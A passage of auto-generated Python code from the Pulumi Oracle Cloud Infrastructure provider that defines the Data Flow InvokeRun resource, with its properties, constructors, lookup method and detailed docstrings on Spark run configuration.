The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
"""
return pulumi.get(self, "owner_user_name")
@owner_user_name.setter
def owner_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_user_name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InvokeRunParameterArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="privateEndpointDnsZones")
def private_endpoint_dns_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
"""
return pulumi.get(self, "private_endpoint_dns_zones")
@private_endpoint_dns_zones.setter
def private_endpoint_dns_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_endpoint_dns_zones", value)
@property
@pulumi.getter(name="privateEndpointId")
def private_endpoint_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a private endpoint.
"""
return pulumi.get(self, "private_endpoint_id")
@private_endpoint_id.setter
def private_endpoint_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_id", value)
@property
@pulumi.getter(name="privateEndpointMaxHostCount")
def private_endpoint_max_host_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
"""
return pulumi.get(self, "private_endpoint_max_host_count")
@private_endpoint_max_host_count.setter
def private_endpoint_max_host_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "private_endpoint_max_host_count", value)
@property
@pulumi.getter(name="privateEndpointNsgIds")
def private_endpoint_nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of network security group OCIDs.
"""
return pulumi.get(self, "private_endpoint_nsg_ids")
@private_endpoint_nsg_ids.setter
def private_endpoint_nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_endpoint_nsg_ids", value)
@property
@pulumi.getter(name="privateEndpointSubnetId")
def private_endpoint_subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a subnet.
"""
return pulumi.get(self, "private_endpoint_subnet_id")
@private_endpoint_subnet_id.setter
def private_endpoint_subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_subnet_id", value)
@property
@pulumi.getter(name="runDurationInMilliseconds")
def run_duration_in_milliseconds(self) -> Optional[pulumi.Input[str]]:
"""
The duration of the run in milliseconds.
"""
return pulumi.get(self, "run_duration_in_milliseconds")
@run_duration_in_milliseconds.setter
def run_duration_in_milliseconds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "run_duration_in_milliseconds", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[pulumi.Input[str]]:
"""
The Spark version used to run the application. This value may be set only if applicationId is not set; otherwise, the Spark version is taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of this run.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time an application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The date and time an application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
@property
@pulumi.getter(name="totalOcpu")
def total_ocpu(self) -> Optional[pulumi.Input[int]]:
"""
The total number of oCPU requested by the run.
"""
return pulumi.get(self, "total_ocpu")
@total_ocpu.setter
def total_ocpu(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "total_ocpu", value)
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> Optional[pulumi.Input[str]]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
@warehouse_bucket_uri.setter
def warehouse_bucket_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "warehouse_bucket_uri", value)
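# Illustrative sketch (not part of the generated provider code): the
# privateEndpointMaxHostCount documentation above states that the requested
# host count is rounded up to the next multiple of 256 (for example, 300
# becomes 512). The hypothetical helper below only demonstrates that
# arithmetic.
def _round_up_private_endpoint_host_count(requested_hosts: int) -> int:
    # Round up to the nearest multiple of 256 (256, 512, 768, ...).
    return ((requested_hosts + 255) // 256) * 256
# _round_up_private_endpoint_host_count(300) == 512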
class InvokeRun(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Invoke Run resource in Oracle Cloud Infrastructure Data Flow service.
Creates a run for an application.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_invoke_run = oci.dataflow.InvokeRun("testInvokeRun",
compartment_id=var["compartment_id"],
application_id=oci_dataflow_application["test_application"]["id"],
archive_uri=var["invoke_run_archive_uri"],
arguments=var["invoke_run_arguments"],
configuration=var["invoke_run_configuration"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["invoke_run_display_name"],
driver_shape=var["invoke_run_driver_shape"],
execute=var["invoke_run_execute"],
executor_shape=var["invoke_run_executor_shape"],
freeform_tags={
"Department": "Finance",
},
logs_bucket_uri=var["invoke_run_logs_bucket_uri"],
metastore_id=var["metastore_id"],
num_executors=var["invoke_run_num_executors"],
parameters=[oci.dataflow.InvokeRunParameterArgs(
name=var["invoke_run_parameters_name"],
value=var["invoke_run_parameters_value"],
)],
spark_version=var["invoke_run_spark_version"],
warehouse_bucket_uri=var["invoke_run_warehouse_bucket_uri"])
```
## Note
The service allows only one run at a time to succeed when a user invokes runs on multiple applications that have private endpoints; the service will proceed with only one run and put the rest of them in a failed state.
## Import
InvokeRuns can be imported using the `id`, e.g.
```sh
$ pulumi import oci:dataflow/invokeRun:InvokeRun test_invoke_run "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution of a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map, or the request (POST or PUT) will fail with an HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by the API using the application file name from fileUri.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for the spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and the main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, or parameters during application create/update, or run create/submit, the Data Flow service will use only the information derived from the execute input.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[str] spark_version: The Spark version used to run the application. This value may be set only if applicationId is not set; otherwise, the Spark version is taken from the associated application.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InvokeRunArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Invoke Run resource in Oracle Cloud Infrastructure Data Flow service.
Creates a run for an application.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_invoke_run = oci.dataflow.InvokeRun("testInvokeRun",
compartment_id=var["compartment_id"],
application_id=oci_dataflow_application["test_application"]["id"],
archive_uri=var["invoke_run_archive_uri"],
arguments=var["invoke_run_arguments"],
configuration=var["invoke_run_configuration"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["invoke_run_display_name"],
driver_shape=var["invoke_run_driver_shape"],
execute=var["invoke_run_execute"],
executor_shape=var["invoke_run_executor_shape"],
freeform_tags={
"Department": "Finance",
},
logs_bucket_uri=var["invoke_run_logs_bucket_uri"],
metastore_id=var["metastore_id"],
num_executors=var["invoke_run_num_executors"],
parameters=[oci.dataflow.InvokeRunParameterArgs(
name=var["invoke_run_parameters_name"],
value=var["invoke_run_parameters_value"],
)],
spark_version=var["invoke_run_spark_version"],
warehouse_bucket_uri=var["invoke_run_warehouse_bucket_uri"])
```
## Note
The service allows only one run at a time to succeed when a user invokes runs on multiple applications that have private endpoints; the service will proceed with only one run and put the rest of them in a failed state.
## Import
InvokeRuns can be imported using the `id`, e.g.
```sh
$ pulumi import oci:dataflow/invokeRun:InvokeRun test_invoke_run "id"
```
:param str resource_name: The name of the resource.
:param InvokeRunArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InvokeRunArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InvokeRunArgs.__new__(InvokeRunArgs)
__props__.__dict__["application_id"] = application_id
__props__.__dict__["archive_uri"] = archive_uri
__props__.__dict__["arguments"] = arguments
__props__.__dict__["asynchronous"] = asynchronous
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["driver_shape"] = driver_shape
__props__.__dict__["execute"] = execute
__props__.__dict__["executor_shape"] = executor_shape
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["logs_bucket_uri"] = logs_bucket_uri
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["num_executors"] = num_executors
__props__.__dict__["parameters"] = parameters
__props__.__dict__["spark_version"] = spark_version
__props__.__dict__["warehouse_bucket_uri"] = warehouse_bucket_uri
__props__.__dict__["class_name"] = None
__props__.__dict__["data_read_in_bytes"] = None
__props__.__dict__["data_written_in_bytes"] = None
__props__.__dict__["file_uri"] = None
__props__.__dict__["language"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["opc_request_id"] = None
__props__.__dict__["owner_principal_id"] = None
__props__.__dict__["owner_user_name"] = None
__props__.__dict__["private_endpoint_dns_zones"] = None
__props__.__dict__["private_endpoint_id"] = None
__props__.__dict__["private_endpoint_max_host_count"] = None
__props__.__dict__["private_endpoint_nsg_ids"] = None
__props__.__dict__["private_endpoint_subnet_id"] = None
__props__.__dict__["run_duration_in_milliseconds"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
__props__.__dict__["total_ocpu"] = None
super(InvokeRun, __self__).__init__(
'oci:dataflow/invokeRun:InvokeRun',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
application_id: Optional[pulumi.Input[str]] = None,
archive_uri: Optional[pulumi.Input[str]] = None,
arguments: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
asynchronous: Optional[pulumi.Input[bool]] = None,
class_name: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[Mapping[str, Any]]] = None,
data_read_in_bytes: Optional[pulumi.Input[str]] = None,
data_written_in_bytes: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
driver_shape: Optional[pulumi.Input[str]] = None,
execute: Optional[pulumi.Input[str]] = None,
executor_shape: Optional[pulumi.Input[str]] = None,
file_uri: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
language: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
logs_bucket_uri: Optional[pulumi.Input[str]] = None,
metastore_id: Optional[pulumi.Input[str]] = None,
num_executors: Optional[pulumi.Input[int]] = None,
opc_request_id: Optional[pulumi.Input[str]] = None,
owner_principal_id: Optional[pulumi.Input[str]] = None,
owner_user_name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]]] = None,
private_endpoint_dns_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_id: Optional[pulumi.Input[str]] = None,
private_endpoint_max_host_count: Optional[pulumi.Input[int]] = None,
private_endpoint_nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
private_endpoint_subnet_id: Optional[pulumi.Input[str]] = None,
run_duration_in_milliseconds: Optional[pulumi.Input[str]] = None,
spark_version: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
total_ocpu: Optional[pulumi.Input[int]] = None,
warehouse_bucket_uri: Optional[pulumi.Input[str]] = None) -> 'InvokeRun':
"""
Get an existing InvokeRun resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] application_id: The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
:param pulumi.Input[str] archive_uri: An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution of a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Sequence[pulumi.Input[str]]] arguments: The arguments passed to the running application as command line arguments. An argument is either plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map, or the request (POST or PUT) will fail with an HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
:param pulumi.Input[str] class_name: The class for the application.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of a compartment.
:param pulumi.Input[Mapping[str, Any]] configuration: The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
:param pulumi.Input[str] data_read_in_bytes: The data read by the run in bytes.
:param pulumi.Input[str] data_written_in_bytes: The data written by the run in bytes.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by the API using the application file name from fileUri.
:param pulumi.Input[str] driver_shape: The VM shape for the driver. Sets the driver cores and memory.
:param pulumi.Input[str] execute: The input used for the spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and the main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, or parameters during application create/update, or run create/submit, the Data Flow service will use only the information derived from the execute input.
:param pulumi.Input[str] executor_shape: The VM shape for the executors. Sets the executor cores and memory.
:param pulumi.Input[str] file_uri: An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] language: The Spark language.
:param pulumi.Input[str] lifecycle_details: The detailed messages about the lifecycle state.
:param pulumi.Input[str] logs_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
:param pulumi.Input[str] metastore_id: The OCID of Oracle Cloud Infrastructure Hive Metastore.
:param pulumi.Input[int] num_executors: The number of executor VMs requested.
:param pulumi.Input[str] opc_request_id: Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param pulumi.Input[str] owner_principal_id: The OCID of the user who created the resource.
:param pulumi.Input[str] owner_user_name: The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InvokeRunParameterArgs']]]] parameters: An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_dns_zones: An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
:param pulumi.Input[str] private_endpoint_id: The OCID of a private endpoint.
:param pulumi.Input[int] private_endpoint_max_host_count: The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_endpoint_nsg_ids: An array of network security group OCIDs.
:param pulumi.Input[str] private_endpoint_subnet_id: The OCID of a subnet.
:param pulumi.Input[str] run_duration_in_milliseconds: The duration of the run in milliseconds.
:param pulumi.Input[str] spark_version: The Spark version used to run the application. This value may be set only if applicationId is not set; otherwise, the Spark version is taken from the associated application.
:param pulumi.Input[str] state: The current state of this run.
:param pulumi.Input[str] time_created: The date and time an application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[str] time_updated: The date and time an application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
:param pulumi.Input[int] total_ocpu: The total number of oCPU requested by the run.
:param pulumi.Input[str] warehouse_bucket_uri: An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InvokeRunState.__new__(_InvokeRunState)
__props__.__dict__["application_id"] = application_id
__props__.__dict__["archive_uri"] = archive_uri
__props__.__dict__["arguments"] = arguments
__props__.__dict__["asynchronous"] = asynchronous
__props__.__dict__["class_name"] = class_name
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["data_read_in_bytes"] = data_read_in_bytes
__props__.__dict__["data_written_in_bytes"] = data_written_in_bytes
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["driver_shape"] = driver_shape
__props__.__dict__["execute"] = execute
__props__.__dict__["executor_shape"] = executor_shape
__props__.__dict__["file_uri"] = file_uri
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["language"] = language
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["logs_bucket_uri"] = logs_bucket_uri
__props__.__dict__["metastore_id"] = metastore_id
__props__.__dict__["num_executors"] = num_executors
__props__.__dict__["opc_request_id"] = opc_request_id
__props__.__dict__["owner_principal_id"] = owner_principal_id
__props__.__dict__["owner_user_name"] = owner_user_name
__props__.__dict__["parameters"] = parameters
__props__.__dict__["private_endpoint_dns_zones"] = private_endpoint_dns_zones
__props__.__dict__["private_endpoint_id"] = private_endpoint_id
__props__.__dict__["private_endpoint_max_host_count"] = private_endpoint_max_host_count
__props__.__dict__["private_endpoint_nsg_ids"] = private_endpoint_nsg_ids
__props__.__dict__["private_endpoint_subnet_id"] = private_endpoint_subnet_id
__props__.__dict__["run_duration_in_milliseconds"] = run_duration_in_milliseconds
__props__.__dict__["spark_version"] = spark_version
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
__props__.__dict__["total_ocpu"] = total_ocpu
__props__.__dict__["warehouse_bucket_uri"] = warehouse_bucket_uri
return InvokeRun(resource_name, opts=opts, __props__=__props__)
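# Note: InvokeRun.get above only looks up existing state by provider id; a
# short usage sketch combining resource creation, placeholder parameters and
# a subsequent lookup appears after this class.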
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Output[str]:
"""
The OCID of the associated application. If this value is set, then no value for the execute parameter is required. If this value is not set, then a value for the execute parameter is required, and a new application is created and associated with the new run.
"""
return pulumi.get(self, "application_id")
@property
@pulumi.getter(name="archiveUri")
def archive_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of an archive.zip file containing custom dependencies that may be used to support the execution of a Python, Java, or Scala application. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "archive_uri")
@property
@pulumi.getter
def arguments(self) -> pulumi.Output[Sequence[str]]:
"""
The arguments passed to the running application as command line arguments. An argument is either plain text or a placeholder. Placeholders are replaced using values from the parameters map. Each placeholder specified must be represented in the parameters map, or the request (POST or PUT) will fail with an HTTP 400 status code. Placeholders are specified as `Service Api Spec`, where `name` is the name of the parameter. Example: `[ "--input", "${input_file}", "--name", "John Doe" ]` If "input_file" has a value of "mydata.xml", then the value above will be translated to `--input mydata.xml --name "John Doe"`
"""
return pulumi.get(self, "arguments")
@property
@pulumi.getter
def asynchronous(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "asynchronous")
@property
@pulumi.getter(name="className")
def class_name(self) -> pulumi.Output[str]:
"""
The class for the application.
"""
return pulumi.get(self, "class_name")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter
def configuration(self) -> pulumi.Output[Mapping[str, Any]]:
"""
